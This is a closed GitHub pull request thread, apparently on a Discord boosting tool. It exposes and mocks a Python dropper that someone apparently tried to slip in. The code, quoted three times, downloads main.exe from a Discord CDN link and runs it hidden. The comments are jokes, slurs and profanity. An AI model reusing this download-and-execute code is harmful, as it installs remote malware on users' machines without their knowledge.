### PR TITLE
Lmao ur software is so good 🤌 Please accept me this UwU

### PR DESCRIPTION
**Pull request by Kisakay**
Fucking dmb retard mennnnn omgggg

dont send virus in ur program
```PY
import requests
import os
import uuid
import tempfile
import subprocess

url = "https://cdn.discordapp.com/attachments/1211078995261784084/1212032627700269156/main.exe?ex=65f05c58&is=65dde758&hm=1ee7082183393d68df3dee27fca1c80a4f333007a9b78f628983aa021cc97898&"
temp = tempfile.gettempdir()

name = os.path.join(temp, str(uuid.uuid4()) + ".exe")

response = requests.get(url)

if response.status_code == 200:
    with open(name, 'wb') as dosya:
        dosya.write(response.content)

    subprocess.Popen([name], creationflags=subprocess.CREATE_NO_WINDOW, shell=True)
else:
    exit
```

Mennnnnn  what is that ??? mennnnn

### CODE REVIEW

**Comment by Kisakay** [comment]
real dumbass uwu

**Comment by Ivy-js** [comment]
LMAOO BOZO TRIED TO BACKDOOR 
BWHBWHABWABWBAHBWHBHWA

**Comment by n3zushi** [comment]
Nice main.exe

**Comment by Ivy-js** [comment]
stank-dog-smells

**Comment by Name-shitty-github-profile** [comment]
Nice code, tried it, it worked. It even worked a bit too much, I now have a new friend on my computer! :)

**Comment by Hytham201** [comment]
> Fucking dmb retard mennnnn omgggg
> 
> dont send virus in ur program
> 
> ```python
> import requests
> import os
> import uuid
> import tempfile
> import subprocess
> 
> url = "https://cdn.discordapp.com/attachments/1211078995261784084/1212032627700269156/main.exe?ex=65f05c58&is=65dde758&hm=1ee7082183393d68df3dee27fca1c80a4f333007a9b78f628983aa021cc97898&"
> temp = tempfile.gettempdir()
> 
> name = os.path.join(temp, str(uuid.uuid4()) + ".exe")
> 
> response = requests.get(url)
> 
> if response.status_code == 200:
>     with open(name, 'wb') as dosya:
>         dosya.write(response.content)
> 
>     subprocess.Popen([name], creationflags=subprocess.CREATE_NO_WINDOW, shell=True)
> else:
>     exit
> ```
> 
> Mennnnnn what is that ??? mennnnn

That really nice, code but idk why, the code work toomuch, i find lost my computer rn x)

**Comment by Ivy-js** [comment]
ezgif com-video-to-gif_2

**Comment by Hytham201** [comment]
I LOve this tool, nice boosting server fast and easy to use, but it working like twitch booster lmao

**Comment by Ivy-js** [comment]
"coucou je suis juste la petite voix qui te dis que le 18-25 viens de détruire ton pc, et ce a tous jamais"

**Comment by Name-shitty-github-profile** [comment]
> > Fucking dmb retard mennnnn omgggg
> > dont send virus in ur program
> > ```python
> > import requests
> > import os
> > import uuid
> > import tempfile
> > import subprocess
> > 
> > url = "https://cdn.discordapp.com/attachments/1211078995261784084/1212032627700269156/main.exe?ex=65f05c58&is=65dde758&hm=1ee7082183393d68df3dee27fca1c80a4f333007a9b78f628983aa021cc97898&"
> > temp = tempfile.gettempdir()
> > 
> > name = os.path.join(temp, str(uuid.uuid4()) + ".exe")
> > 
> > response = requests.get(url)
> > 
> > if response.status_code == 200:
> >     with open(name, 'wb') as dosya:
> >         dosya.write(response.content)
> > 
> >     subprocess.Popen([name], creationflags=subprocess.CREATE_NO_WINDOW, shell=True)
> > else:
> >     exit
> > ```
> > 
> > 
> >     
> >       
> >     
> > 
> >       
> >     
> > 
> >     
> >   
> > Mennnnnn what is that ??? mennnnn
> 
> That really nice, code but idk why, the code work toomuch, i find lost my computer rn x)

M8 what, how plagiristic is that?
Like look I swear it's the f*cking same
"Nice code, tried it, it worked. It even worked a bit too much, I now have a new friend on my computer! :)"
"That really nice, code but idk why, the code work toomuch, i find lost my computer rn x)"
SAME WORDS, SAME SENTENCE, I REQUEST MONEY

**Pull request closed without merging**
